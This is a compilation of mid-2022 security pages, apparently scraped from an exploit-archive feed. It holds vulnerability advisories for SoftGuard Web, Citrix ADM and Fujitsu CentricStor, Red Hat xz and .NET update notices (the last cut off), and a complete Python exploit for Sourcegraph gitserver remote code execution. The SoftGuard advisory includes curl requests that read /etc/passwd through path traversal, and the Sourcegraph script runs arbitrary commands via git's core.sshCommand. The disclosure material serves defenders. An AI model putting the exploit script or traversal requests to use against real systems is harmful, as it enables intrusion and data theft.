SoftGuard Web (SGW) versions prior to 5.1.5 suffer from html injection and arbitrary file system access allow for file downloads.

SEC Consult Vulnerability Lab Security Advisory < 20220609-0 >  
=======================================================================  
               title: Multiple vulnerabilities  
             product: SoftGuard SNMP Network Management Extension  
  vulnerable version: SoftGuard Web (SGW) < 5.1.5  
       fixed version: SoftGuard version 5.1.5 from 2022-06-01  
          CVE number: CVE-2022-31201, CVE-2022-31202  
              impact: High  
            homepage: https://gravitate.eu (reseller)  
               found: 2022-04-14  
                  by: Philipp Espernberger (Office Linz)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
There is no public description available for this vendor/product. The following  
description was provided as documentation:

"SoftGuard is a network management extension which collects inventory-, analysis-  
and debugging data of devices and networks at least once a day. SoftGuard has an  
open structure, is built simple, is easily expandable, easy to use and is laid out  
for large scale networks. The data collection is performed with the protocols SNMP  
supporting the versions 1, 2c and 3. Additional protocols like ssh, telnet, rsh,  
https, NetBIOS/IP, ICMP ... complemented by SNMP if required.

The SoftGuard Suite consists of three parts:

* SoftGuard Network Center (SNC)  
* SoftGuard Host Center (SHC)  
* SoftGuard Monitor Center (SMC)

Aditionally there are a bunch of common and customer specific expansions like  
SoftGuard Web (SGW), SoftGuard Statistic Tool (SST), Port Configuration Tool (PCT),  
Network Access Points (NAP), Technician Access Point (TAP), etc."

Business recommendation:  
------------------------  
SEC Consult recommends to update to the latest version of SoftGuard (network management  
extension).

An in-depth security analysis performed by security professionals is highly  
advised, to identify and resolve potential further critical security issues.

Vulnerability overview/description:  
-----------------------------------  
1) File System Access (CVE-2022-31202)  
The export function allows authenticated attackers to download any  
arbitrary local file from the file system due to insufficient input  
validation. The unfiltered URL parameter query enables an attacker to  
access arbitrary local files. This allows the attacker to define the  
complete path and the filename by himself. Files that include passwords  
and other sensitive information can be accessed.  
Furthermore, the built-in man functionality also allows attackers to  
read any arbitrary local file from the file system.

2) HTML Injection (CVE-2022-31201)  
Various components do not properly sanitize/encode user input. This  
leads to HTML injection vulnerabilities. By exploiting this vulnerability,  
an attacker can include arbitrary HTML into the affected web page. The  
code is executed in the context of the victim's browser when visiting  
the manipulated URL. The vulnerability can be used to change the contents  
of the displayed site or redirect to other sites.

During the security assessment it was not possible to execute JavaScript  
code because the security headers Content-Security-Policy and  
X-Content-Type-Options are preventing the execution.

Proof of concept:  
-----------------  
1) File System Access (CVE-2022-31202)  
1a) Export functionality  
In order to access arbitrary local files, the export function as authenticated  
user (Administration -> User -> Access -> Export) can be used. The following URL  
was used to set the filename to /etc/passwd  
===============================================================================  
https://$host:8016/sgw/export?dbs=file&db=DefUser_access_$username_db%2e  
1649426888398872%2etmp&query=file%3a/etc/passwd'

===============================================================================

The newly set filename (/etc/passwd) can be exported and downloaded via the  
execution button. Afterwards the content of the file gets downloaded successfully.  
===============================================================================  
root:x:0:0:root:/root:/bin/bash  
bin:x:1:1:bin:/bin:/sbin/nologin  
daemon:x:2:2:daemon:/sbin:/sbin/nologin  
adm:x:3:4:adm:/var/adm:/sbin/nologin  
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin  
sync:x:5:0:sync:/sbin:/bin/sync  
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin  
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin  
nobody:x:99:99:Nobody:/:/sbin/nologin  
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin  
dbus:x:81:81:System message bus:/:/sbin/nologin  
[...]  
===============================================================================

1b) MAN functionality  
The following curl command shows how an authenticated attacker can gain access  
to any arbitrary local file:  
===============================================================================  
curl 'https://$host:8016/cgi-bin/man.tcl' -H 'Authorization: Basic [...]'  
--data 'act=1&x=%2Fetc%2Fpasswd&submit=Execute' --compressed --insecure

===============================================================================

The curl response includes the contents of the file:  
===============================================================================  
<!DOCTYPE html>  
<html lang="en"><head><meta charset="UTF-8" />  
[...]  
<pre>  
root:x:0:0:root:/root:/bin/bash  
bin:x:1:1:bin:/bin:/sbin/nologin  
daemon:x:2:2:daemon:/sbin:/sbin/nologin  
adm:x:3:4:adm:/var/adm:/sbin/nologin  
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin  
sync:x:5:0:sync:/sbin:/bin/sync  
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin  
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin  
nobody:x:99:99:Nobody:/:/sbin/nologin  
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin  
dbus:x:81:81:System message bus:/:/sbin/nologin  
[...]  
===============================================================================

2) HTML Injection (CVE-2022-31201)  
When a new graph is created an authenticated attacker controls the GET parameters  
and can inject malicious content. The following curl command shows how an  
authenticated attacker can inject HTML code:  
===============================================================================  
curl 'https://$host:8016/sgw/graph?tbl=sgNode&t=percent&h=Status%3Ch1%3ESEC-  
Consult%3C/h1%3E+%23&v=%7bdown+1934+orange%7d+%7bicmp+555+red%7d+%7bsnmpaaaa+8723+green%7d&scale=5'  
-H 'Authorization: Basic [...]' --compressed --insecure

===============================================================================

The curl response includes the injected HTML code <h1>SEC Consult</h1>:  
===============================================================================  
<!DOCTYPE html>  
<html lang="en">  
<head>  
  <meta charset="UTF-8"/>  
  <title>SGW - Graph: Node</title>  
[...]  
</head>  
<body class="master">  
  [...]  
  <caption>∑3, Status<h1>SEC Consult</h1>, #11212</caption>  
  [...]  
  <tr><td>Status<h1>SEC Consult</h1></td>  
[...]  
</body></html>  
===============================================================================

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested and found to be vulnerable:  
* SoftGuard Web (SGW) 5.1.3

The vendor provided the following information regarding the affected versions:

1a) affected version 4.5.0 (2019-05-04) to version 4.5.8 (2020-05-05)  
1b) since SoftGuard 2.0 with SoftGuard Web 1.0 (~1998/99)  
2)  since SoftGuard 3.6.0 (2009-10-31) / SoftGuard 3.6.6 (2011-02-15) with  
     SoftGuard Web 2.6.0/2.6.6

Vendor contact timeline:  
------------------------  
2022-05-11: Contacting vendor through direct email address.  
2022-05-11: Sent encrypted security advisory to vendor  
2022-05-12: Received feedback from the vendor for the security advisory  
2022-05-16: Received confirmation that a new version of SoftGuard was  
             already rolled out to the customers which included the fix  
2022-05-16: Received additional information which versions are vulnerable  
2022-05-19: Received CVE numbers.  
2022-05-20: Reviewed the fixed version 5.1.4 and found that HTML injection  
             still works at other endpoints, other issues are fixed.  
2022-05-20: Vendor replies that new version 5.1.5. will be released on 1st June.  
2022-06-01: Vendor releases patched version 5.1.5.  
2022-06-09: Coordinated release of security advisory.

Solution:  
---------  
The vendor rolled out new software versions. Affected users should verify that  
they are using the latest version available (5.1.5 from 2022-06-01 or higher).

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF P. Espernberger / @2022

SoftGuard SNMP Network Management Extension HTML Injection / File Download

Improper access control flaw poses DoS-to-RCE hijack risk

John Leyden 20 June 2022 at 15:44 UTC

Improper access control flaw poses DoS-to-RCE hijack risk

Citrix has patched a critical vulnerability in its Application Delivery Management (ADM) technology that, if left unresolved, creates a means for remote attackers to reset admin passwords.

The improper access control vulnerability (CVE-2022-27511) created a risk that a remote, unauthenticated user could not only crash a system via a denial-of-service (DoS) exploit, but go on to reset admin credentials on the next subsequent reboot.

An advisory by Citrix issued last week explains that vulnerability could be abused to trigger the “reset of the administrator password at the next device reboot, allowing an attacker with SSH \[Secure Shell\] access to connect with the default administrator credentials after the device has rebooted”.

**Access granted**

The particulars of the issue turn what would normally be a system corruption problem into a much more severe vulnerability with a severity akin to that posed by an unauthenticated, remote code execution (RCE) flaw.

Another, less severe vulnerability (CVE-2022-27512) creates a means to temporarily disrupt the ADM license service.

All supported versions of Citrix ADM server and Citrix ADM agent are affected by the vulnerabilities, which were both discovered by security researchers from German firm Code White.

Catch up on the latest network security news

Citrix urged enterprise sysadmins to upgrade to the most recent versions of its technology – Citrix ADM 13.1-21.53, Citrix ADM 13.0-85.19, or subsequent releases.

An advisory from the US Cybersecurity and Infrastructure Security Agency warns that an “attacker could exploit these vulnerabilities to take control of an affected system”, emphasizing the seriousness of the potential risk.

The Daily Swig contacted the researchers at Code White, who declined to comment further at this time, adding they had no immediate plans to release any blog post or technical write-up.

Citrix ADM offers a web-based technology for managing Citrix deployment in the cloud or on-premise. Although known for thin client computing, Citrix these days offers a range of networking product that improves the delivery speed and quality of apps served to end users. This functionality is delivered through load balancing and web app acceleration technologies.

YOU MIGHT ALSO LIKE Attackers can use ‘Scroll to Text Fragment’ web browser feature to steal data – research

Critical Citrix ADM vulnerability creates means to reset admin passwords

An issue was discovered on Fujitsu ETERNUS CentricStor CS8000 (Control Center) devices before 8.1A SP02 P04. The vulnerability resides in the grel_finfo function in grel.php. An attacker is able to influence the username (user), password (pw), and file-name (file) parameters and inject special characters such as semicolons, backticks, or command-substitution sequences in order to force the application to execute arbitrary commands.

**Summary**

On the 6th of April 2022, NCC Group’s Fox-IT discovered two separate flaws in FUJITSU CentricStor Control Center V8.1 which allows an attacker to gain remote code execution on the appliance without prior authentication or authorization.

The vulnerability is caused due to a lack of user input validation in two PHP scripts, which are normally included post-authentication. As no include-guards are in-place, an attacker is able to trigger the script without prior authentication by calling it directly.

**Impact**

An attacker is able to take control over the appliance as if they were logged in directly via a secure shell. If exploited, the attacker obtains limited user privileges on the machine as the “www-data” user; however, it should be noted that the Kernel on the system which NCC Group’s Fox-IT encountered is severely outdated, allowing an attacker to easily escalate their privileges to the administrative “root” user of the system.

Due to the sensitive nature of the system, any attacker with full control over the system is potentially able to read, modify and potentially destroy the entire virtual backup tapes, which could be used as an initial stage of a ransomware attack to ensure the victim is not able to recover and is forced to pay the ransom.

The following screenshot shows how NCC Group’s Fox-IT was able to gain remote code execution on the appliance using a custom-built Metasploit\[1\] module:

Figure 1 – Obtaining a Meterpreter\[2\] shell using a custom-built Metasploit module

**Details**

During a recent penetration test at one of NCC Group’s Fox-IT’s clients, a full review was performed of the backup process, as well as any appliances used, as to ensure the company has full system backups in the event of a ransomware breakout. One of the appliances in question was the FUJITSU CentricStor Control Center. Fox-IT requested read-only access to the appliance in order to assess the security of the product.

The web-application used to manage the backups was inspected, which lead NCC Group’s Fox-IT to discover the existence of two scripts, which are accessible by any user on the network and which pass user input directly to the “shell\_exec” and “system” functions.

The two files in questions are as follows:

*   /srv/www/htdocs/custom/library/system/grel.php
*   /srv/www/htdocs/custom/library/system/hw_view.php

**Command injection in grel.php (grelFileInfo)**

The first vulnerability resides in the “grel\_finfo” function in grel.php. An attacker is able to influence the username (“user”), password (“pw”), and file-name (“file”) parameters and inject special characters such as semicolons, backticks, or command-substitution sequences in order to force the application to execute arbitrary commands. The following screenshots show this in more detail:

Figure 2 – The grel\_finfo function is defined and passes the $pw and $user variables directly to the system function call

Figure 3 – The grel\_finfo function is called without any prior authentication

**Command injection in hw\_view.php**

The second vulnerability resides in the "requestTempFile" function in hw_view.php. An attacker is able to influence the “unitName” POST parameter and inject special characters such as semicolons, backticks, or command-substitution sequences in order to force the application to execute arbitrary commands. The following screenshot shows this in more detail:

Figure 4 – The $unitName POST variable is passed directly to the shell\_exec function without prior authentication

**Recommendation**

Upgrade the product to versions v8.1A SP02 P04 or v8.0A SP01. Unfortunately, a dedicated Fujitsu customer request is required to do this due the software distribution model. For more information please contact Fujitsu through their ServiceNow Portal or Support Assistant.

Lastly, block any inbound traffic to port 80 and 443 through the use of a network firewall. Traffic should be selectively allowed only to other instances of the appliance, and only made directly accessible through a management LAN. This ensures attackers are not able to reach the machine without gaining access to this network segment first.

Another temporary measure to secure the application for the time being could be to force the web-interface to bind to the local loopback interface (127.0.0.1) and using a reverse SSH forward to access the service that way. This ensures no attackers are able to reach the web-interface before authenticating over SSH first. Please note that this might void your warranty, as such it is not recommended.

**Vendor Notice**

*   Fujitsu-PSIRT-PSS-IS-2022-050316-Security-Notice-SF.pdf

**Footnotes**

1\. https://en.wikipedia.org/wiki/Metasploit\_Project

2\. https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/

3\. https://www.php.net/manual/en/function.escapeshellarg.php

**Published** May 27, 2022June 9, 2022

**Post navigation**

CVE-2022-31795: Technical Advisory – FUJITSU CentricStor Control Center <= V8.1 – Unauthenticated Command Injection

Red Hat Security Advisory 2022-5052-01 - XZ Utils is an integrated collection of user-space file compression utilities based on the Lempel-Ziv-Markov chain algorithm, which performs lossless data compression. The algorithm provides a high compression ratio while keeping the decompression time short.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: xz security update  
Advisory ID:       RHSA-2022:5052-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5052  
Issue date:        2022-06-15  
CVE Names:         CVE-2022-1271   
=====================================================================

1. Summary:

An update for xz is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

XZ Utils is an integrated collection of user-space file compression  
utilities based on the Lempel-Ziv-Markov chain algorithm (LZMA), which  
performs lossless data compression. The algorithm provides a high  
compression ratio while keeping the decompression time short.

Security Fix(es):

* gzip: arbitrary-file-write vulnerability (CVE-2022-1271)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2073310 - CVE-2022-1271 gzip: arbitrary-file-write vulnerability

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
xz-5.2.2-2.el7_9.src.rpm

x86_64:  
xz-5.2.2-2.el7_9.x86_64.rpm  
xz-debuginfo-5.2.2-2.el7_9.i686.rpm  
xz-debuginfo-5.2.2-2.el7_9.x86_64.rpm  
xz-libs-5.2.2-2.el7_9.i686.rpm  
xz-libs-5.2.2-2.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:  
xz-compat-libs-5.2.2-2.el7_9.i686.rpm  
xz-compat-libs-5.2.2-2.el7_9.x86_64.rpm  
xz-debuginfo-5.2.2-2.el7_9.i686.rpm  
xz-debuginfo-5.2.2-2.el7_9.x86_64.rpm  
xz-devel-5.2.2-2.el7_9.i686.rpm  
xz-devel-5.2.2-2.el7_9.x86_64.rpm  
xz-lzma-compat-5.2.2-2.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
xz-5.2.2-2.el7_9.src.rpm

x86_64:  
xz-5.2.2-2.el7_9.x86_64.rpm  
xz-debuginfo-5.2.2-2.el7_9.i686.rpm  
xz-debuginfo-5.2.2-2.el7_9.x86_64.rpm  
xz-libs-5.2.2-2.el7_9.i686.rpm  
xz-libs-5.2.2-2.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64:  
xz-compat-libs-5.2.2-2.el7_9.i686.rpm  
xz-compat-libs-5.2.2-2.el7_9.x86_64.rpm  
xz-debuginfo-5.2.2-2.el7_9.i686.rpm  
xz-debuginfo-5.2.2-2.el7_9.x86_64.rpm  
xz-devel-5.2.2-2.el7_9.i686.rpm  
xz-devel-5.2.2-2.el7_9.x86_64.rpm  
xz-lzma-compat-5.2.2-2.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
xz-5.2.2-2.el7_9.src.rpm

ppc64:  
xz-5.2.2-2.el7_9.ppc64.rpm  
xz-debuginfo-5.2.2-2.el7_9.ppc.rpm  
xz-debuginfo-5.2.2-2.el7_9.ppc64.rpm  
xz-devel-5.2.2-2.el7_9.ppc.rpm  
xz-devel-5.2.2-2.el7_9.ppc64.rpm  
xz-libs-5.2.2-2.el7_9.ppc.rpm  
xz-libs-5.2.2-2.el7_9.ppc64.rpm

ppc64le:  
xz-5.2.2-2.el7_9.ppc64le.rpm  
xz-debuginfo-5.2.2-2.el7_9.ppc64le.rpm  
xz-devel-5.2.2-2.el7_9.ppc64le.rpm  
xz-libs-5.2.2-2.el7_9.ppc64le.rpm

s390x:  
xz-5.2.2-2.el7_9.s390x.rpm  
xz-debuginfo-5.2.2-2.el7_9.s390.rpm  
xz-debuginfo-5.2.2-2.el7_9.s390x.rpm  
xz-devel-5.2.2-2.el7_9.s390.rpm  
xz-devel-5.2.2-2.el7_9.s390x.rpm  
xz-libs-5.2.2-2.el7_9.s390.rpm  
xz-libs-5.2.2-2.el7_9.s390x.rpm

x86_64:  
xz-5.2.2-2.el7_9.x86_64.rpm  
xz-debuginfo-5.2.2-2.el7_9.i686.rpm  
xz-debuginfo-5.2.2-2.el7_9.x86_64.rpm  
xz-devel-5.2.2-2.el7_9.i686.rpm  
xz-devel-5.2.2-2.el7_9.x86_64.rpm  
xz-libs-5.2.2-2.el7_9.i686.rpm  
xz-libs-5.2.2-2.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64:  
xz-compat-libs-5.2.2-2.el7_9.ppc.rpm  
xz-compat-libs-5.2.2-2.el7_9.ppc64.rpm  
xz-debuginfo-5.2.2-2.el7_9.ppc.rpm  
xz-debuginfo-5.2.2-2.el7_9.ppc64.rpm  
xz-lzma-compat-5.2.2-2.el7_9.ppc64.rpm

ppc64le:  
xz-compat-libs-5.2.2-2.el7_9.ppc64le.rpm  
xz-debuginfo-5.2.2-2.el7_9.ppc64le.rpm  
xz-lzma-compat-5.2.2-2.el7_9.ppc64le.rpm

s390x:  
xz-compat-libs-5.2.2-2.el7_9.s390.rpm  
xz-compat-libs-5.2.2-2.el7_9.s390x.rpm  
xz-debuginfo-5.2.2-2.el7_9.s390.rpm  
xz-debuginfo-5.2.2-2.el7_9.s390x.rpm  
xz-lzma-compat-5.2.2-2.el7_9.s390x.rpm

x86_64:  
xz-compat-libs-5.2.2-2.el7_9.i686.rpm  
xz-compat-libs-5.2.2-2.el7_9.x86_64.rpm  
xz-debuginfo-5.2.2-2.el7_9.i686.rpm  
xz-debuginfo-5.2.2-2.el7_9.x86_64.rpm  
xz-lzma-compat-5.2.2-2.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
xz-5.2.2-2.el7_9.src.rpm

x86_64:  
xz-5.2.2-2.el7_9.x86_64.rpm  
xz-debuginfo-5.2.2-2.el7_9.i686.rpm  
xz-debuginfo-5.2.2-2.el7_9.x86_64.rpm  
xz-devel-5.2.2-2.el7_9.i686.rpm  
xz-devel-5.2.2-2.el7_9.x86_64.rpm  
xz-libs-5.2.2-2.el7_9.i686.rpm  
xz-libs-5.2.2-2.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:  
xz-compat-libs-5.2.2-2.el7_9.i686.rpm  
xz-compat-libs-5.2.2-2.el7_9.x86_64.rpm  
xz-debuginfo-5.2.2-2.el7_9.i686.rpm  
xz-debuginfo-5.2.2-2.el7_9.x86_64.rpm  
xz-lzma-compat-5.2.2-2.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1271  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYqod9tzjgjWX9erEAQhznQ/6A5c86aUD64VtP1fn/0w9WosRYgk+cuwi  
k/YNc8W7uz3DEUwFb6cLRldBT+EwG5I8C/5/JfbS44mCBwQl8a16jv+58V7Hz6XO  
2AhG+cEf/8dlLobZaPKayDj9IMjrBbQUPWXhd38dhHzn2C1Aq3CFs2K2ZyDq64jT  
GwgcYcb0obkysZTibs9ACTq4lxI3UMNOKZlb+prQ+ddSkBTtBAoPLP+DLy+f3FB+  
2xc1SHZQjO4D2xeMCGoye4Q0MWG31mCuXQqEObTUcM+G747BKoi+R7LEgjXG93rv  
KbVJbFs/DRSQ/7ltR/kSu+xkTDisr3llCfzv7bPqjTCax6j1SBfJC1XGzwwuMFLo  
1kz/lntw8lSvUyipjwtV2iU/j5aam6rJs9fDpN4ceFDMXHQ4A19IUMGi2IJSGFNP  
0/vaJqwb8NN0MIZwSShgLqoRK8/eQJIadytWJ+Rwu6gEZvHYyCAGRHqNIDk9CGGG  
Aa0tRH9Hkh/EQchcbYz2WZ5fhCE1pX08fWgQfp7R7X65tSnXwky6Lfqej3yGXMs2  
CGXGJT8lMsPca4WC4v8SUh5MiUJ4KlTuvxnnJG8tCaNHFRRfU9pciEAdeTUaBm6U  
RZTLKoOdYHyLJak8OyvA3V5GNKeKWYk6N533jDtw/slMBJoa+44u3o+Ol7Zq0FWc  
SeB0A7Uonb8=  
=5KUh  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5052-01

Sourcegraph Gitserver version 3.36.3 suffers from a remote code execution vulnerability.

    # Exploit Title: Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)# Date: 2022-06-10# Exploit Author: Altelus# Vendor Homepage: https://about.sourcegraph.com/# Version: 3.63.3 # Tested on: Linux# CVE : CVE-2022-23642# Docker Container: sourcegraph/server:3.36.3# Sourcegraph prior to 3.37.0 has a remote code execution vulnerability on its gitserver service. # This is due to lack of restriction on git config execution thus "core.sshCommand" can be passed # on the HTTP arguments which can contain arbitrary bash commands. Note that this is only possible # if gitserver is exposed to the attacker. This is tested on Sourcegraph 3.36.3## Exploitation parameters:# - Exposed Sourcegraph gitserver# - Existing repo on sourcegraphimport jsonimport argparseimport requestsdef exploit(host, existing_git, cmd):    # setting sshCommand    data = {        "Repo" : existing_git,        "Args" : [            "config",            "core.sshCommand",            cmd        ]    }    res = requests.get(host+"/exec", json=data).text    if len(res) > 0:        print("[-] Didn't work: {}".format(res))        exit(0)    # setting fake origin    data = {        "Repo" : existing_git,        "Args" : [            "remote",            "add",            "origin",            "git@lolololz:foo/bar.git"        ]    }    res = requests.get(host+"/exec", json=data).text    if len(res) > 0:        print("[-] Didn't work: {}".format(res))        exit(0)    # triggering command using push    data = {        "Repo" : existing_git,        "Args" : [            "push",            "origin",            "master"        ]    }    res = requests.get(host+"/exec", json=data).text    print("[*] Finished executing exploit")parser = argparse.ArgumentParser()parser.add_argument('--gitserver-host', required=True, help="Target Sourcegraph Gitserver Host")parser.add_argument('--existing-git', required=True, help="e.g. Link of existing repository in target Sourcegraph")parser.add_argument('--cmd', required=True, help="Command to run")args = parser.parse_args()host = args.gitserver_hostexisting_git = args.existing_gitcmd = args.cmdexploit(host, existing_git, cmd)

Sourcegraph Gitserver 3.36.3 Remote Code Execution

Red Hat Security Advisory 2022-5046-01 - .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 6.0.106 and .NET Runtime 6.0.6. Issues addressed include a password leak vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: .NET 6.0 security and bugfix update  
Advisory ID:       RHSA-2022:5046-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5046  
Issue date:        2022-06-15  
CVE Names:         CVE-2022-30184   
=====================================================================

1. Summary:

An update for .NET 6.0 is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 8) - aarch64, s390x, x86_64  
Red Hat Enterprise Linux AppStream (v. 8) - aarch64, s390x, x86_64

3. Description:

.NET is a managed-software framework. It implements a subset of the .NET  
framework APIs and several new APIs, and it includes a CLR implementation.

New versions of .NET that address a security vulnerability are now  
available. The updated versions are .NET SDK 6.0.106 and .NET Runtime  
6.0.6.

Security Fix(es):

* dotnet: NuGet Credential leak due to loss of control of third party  
symbol server domain (CVE-2022-30184)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2096963 - CVE-2022-30184 dotnet: NuGet Credential leak due to loss of control of third party symbol server domain

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
dotnet6.0-6.0.106-1.el8_6.src.rpm

aarch64:  
aspnetcore-runtime-6.0-6.0.6-1.el8_6.aarch64.rpm  
aspnetcore-targeting-pack-6.0-6.0.6-1.el8_6.aarch64.rpm  
dotnet-6.0.106-1.el8_6.aarch64.rpm  
dotnet-apphost-pack-6.0-6.0.6-1.el8_6.aarch64.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.6-1.el8_6.aarch64.rpm  
dotnet-host-6.0.6-1.el8_6.aarch64.rpm  
dotnet-host-debuginfo-6.0.6-1.el8_6.aarch64.rpm  
dotnet-hostfxr-6.0-6.0.6-1.el8_6.aarch64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.6-1.el8_6.aarch64.rpm  
dotnet-runtime-6.0-6.0.6-1.el8_6.aarch64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.6-1.el8_6.aarch64.rpm  
dotnet-sdk-6.0-6.0.106-1.el8_6.aarch64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.106-1.el8_6.aarch64.rpm  
dotnet-targeting-pack-6.0-6.0.6-1.el8_6.aarch64.rpm  
dotnet-templates-6.0-6.0.106-1.el8_6.aarch64.rpm  
dotnet6.0-debuginfo-6.0.106-1.el8_6.aarch64.rpm  
dotnet6.0-debugsource-6.0.106-1.el8_6.aarch64.rpm  
netstandard-targeting-pack-2.1-6.0.106-1.el8_6.aarch64.rpm

s390x:  
aspnetcore-runtime-6.0-6.0.6-1.el8_6.s390x.rpm  
aspnetcore-targeting-pack-6.0-6.0.6-1.el8_6.s390x.rpm  
dotnet-6.0.106-1.el8_6.s390x.rpm  
dotnet-apphost-pack-6.0-6.0.6-1.el8_6.s390x.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.6-1.el8_6.s390x.rpm  
dotnet-host-6.0.6-1.el8_6.s390x.rpm  
dotnet-host-debuginfo-6.0.6-1.el8_6.s390x.rpm  
dotnet-hostfxr-6.0-6.0.6-1.el8_6.s390x.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.6-1.el8_6.s390x.rpm  
dotnet-runtime-6.0-6.0.6-1.el8_6.s390x.rpm  
dotnet-runtime-6.0-debuginfo-6.0.6-1.el8_6.s390x.rpm  
dotnet-sdk-6.0-6.0.106-1.el8_6.s390x.rpm  
dotnet-sdk-6.0-debuginfo-6.0.106-1.el8_6.s390x.rpm  
dotnet-targeting-pack-6.0-6.0.6-1.el8_6.s390x.rpm  
dotnet-templates-6.0-6.0.106-1.el8_6.s390x.rpm  
dotnet6.0-debuginfo-6.0.106-1.el8_6.s390x.rpm  
dotnet6.0-debugsource-6.0.106-1.el8_6.s390x.rpm  
netstandard-targeting-pack-2.1-6.0.106-1.el8_6.s390x.rpm

x86_64:  
aspnetcore-runtime-6.0-6.0.6-1.el8_6.x86_64.rpm  
aspnetcore-targeting-pack-6.0-6.0.6-1.el8_6.x86_64.rpm  
dotnet-6.0.106-1.el8_6.x86_64.rpm  
